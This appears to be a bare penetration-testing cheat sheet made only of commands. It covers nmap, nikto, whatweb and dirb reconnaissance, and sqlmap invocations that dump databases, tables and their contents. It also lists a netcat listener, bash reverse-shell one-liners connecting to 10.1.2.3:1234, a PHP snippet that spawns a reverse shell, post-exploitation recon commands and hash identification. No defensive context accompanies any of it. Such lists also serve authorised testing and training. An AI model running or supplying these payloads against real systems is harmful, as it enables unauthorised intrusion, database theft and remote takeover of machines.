Scan all TCP ports quickly
nmap -Pn -n -v -sT -p- -T5 10.0.1.2
In-depth scan specific ports
nmap -Pn -n -v -sT -p 22,80 -A 10.0.1.2
Nikto vulnerability scanner
nikto -h 10.1.2.3 -C all
whatweb web technology identifier
whatweb -v -a 3 192.168.0.102
Path enumeration with dirbuster:
dirb http://10.10.11.253
Check fields in HTTP GET
sqlmap -u "http://10.2.3.4/path/vulnerable.php?fieldname=value" -p fieldname --level 5 --risk 3 --dbs
Use intercepted request from Burp:
sqlmap -r request.txt ...
Dump databases:
sqlmap -r request.txt -p [parameters to test] --level 5 --risk 3 --dbs
Dump tables for given database:
sqlmap -r request.txt -p [parameters to test] --level 5 --risk 3 -D db_name --tables
Dump given table for given database:
sqlmap -r request.txt -p [parameters to test] --level 5 --risk 3 -D db_name -T table_name --dump
nc -lvnp [receiving port]
/bin/bash -i >& /dev/tcp/10.1.2.3/1234 0>&1
/bin/bash -l > /dev/tcp/10.1.2.3/1234 0<&1 2>&1
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.1.2.3/1234 0>&1'");
?>
User info, groups, etc
whoami
groups
Available sudo options
sudo -l
Get the full command line for a process (PowerShell)
gwmi win32_process | Format-Table -Property ProcessId,commandline | findstr targetprocessname|pid
Lookup hash type:
hashid -m "hash"
$ hashid -m '$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2'
Analyzing '$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x
[+] bcrypt [Hashcat Mode: 3200]